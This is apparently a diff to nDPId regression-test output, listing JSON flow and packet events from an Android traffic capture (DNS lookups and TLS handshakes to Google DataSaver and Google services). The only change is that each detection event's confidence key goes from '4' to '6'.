00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871814,"flow_last_seen":1582454871814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871814,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1582454871814,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871814,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8CFFAAEAGrQ\/AqAIQrNkVysroAbtCYT8sAAAAAKAC\/\/889QAAAgQFtAQCCAr\/\/zd9AAAAAAEDAwg="} -00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871745,"flow_last_seen":1582454871818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871818,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871745,"flow_last_seen":1582454871818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871818,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871823,"flow_last_seen":1582454871823,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871823,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1582454871823,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871823,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrCJAAEARCSjAqAIQwKgCASm1ADUALW7k1fkBAAABAAAAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAQ=="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871823,"flow_last_seen":1582454871823,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871823,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871823,"flow_last_seen":1582454871823,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871823,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1582454871824,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871824,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRS4IAAEARqbjAqAIBwKgCEAA1KbUAPSLB1fmBgAABAAEAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAJMABKzZFEw="} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":384,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871823,"flow_last_seen":1582454871824,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871824,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":384,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871823,"flow_last_seen":1582454871824,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871824,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1582454871827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871827,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8rCNAAEARCSzAqAIQwKgCAYBAADUAKPh7cqMBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1582454871827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454871827,"pkt":"TGr2n\/YnxiwDYGpkCABFAABMd48AAEARfbDAqAIBwKgCEAA1gEAAOLeFcqOBgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871829,"flow_last_seen":1582454871829,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871829,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1582454871829,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871829,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SmpAAEAGbHTAqAIQrNkUTKp+Abul3n3qAAAAAKAC\/\/+8ngAAAgQFtAQCCAr\/\/zeAAAAAAAEDAwg="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871839,"flow_last_seen":1582454871839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871839,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -287,98 +288,98 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1582454871855,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871855,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0wixAAEAGtnfAqAIQ2O8meID2AbsYfvWpTGBDc4AQAVe7FAAAAQEICv\/\/N4fDx9w1"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1582454871867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871867,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8+7cAAHUGxias2RRMwKgCEAG7qn7jcCu5pd5966AS6yBHnwAAAgQFZAQCCArp2ZEZ\/\/83gAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1582454871873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871873,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SmtAAEAGbHvAqAIQrNkUTKp+Abul3n3r43AruoAQAVdf2wAAAQEICv\/\/N4vp2ZEZ"} -00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871814,"flow_last_seen":1582454871879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":594,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1582454871879,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871839,"flow_last_seen":1582454871880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871880,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871814,"flow_last_seen":1582454871879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":594,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1582454871879,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871839,"flow_last_seen":1582454871880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871880,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871881,"flow_last_seen":1582454871881,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871881,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1582454871881,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1582454871881,"pkt":"xiwDYGpkTGr2n\/YnCABFAABErDBAAEARCRfAqAIQwKgCAZtQADUAMNjjuKUBAAABAAAAAAAAB2FuZHJvaWQKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871881,"flow_last_seen":1582454871881,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871881,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871829,"flow_last_seen":1582454871890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871890,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871839,"flow_last_seen":1582454871911,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871911,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871814,"flow_last_seen":1582454871913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1582454871913,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871881,"flow_last_seen":1582454871881,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871881,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871829,"flow_last_seen":1582454871890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871890,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871839,"flow_last_seen":1582454871911,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871911,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 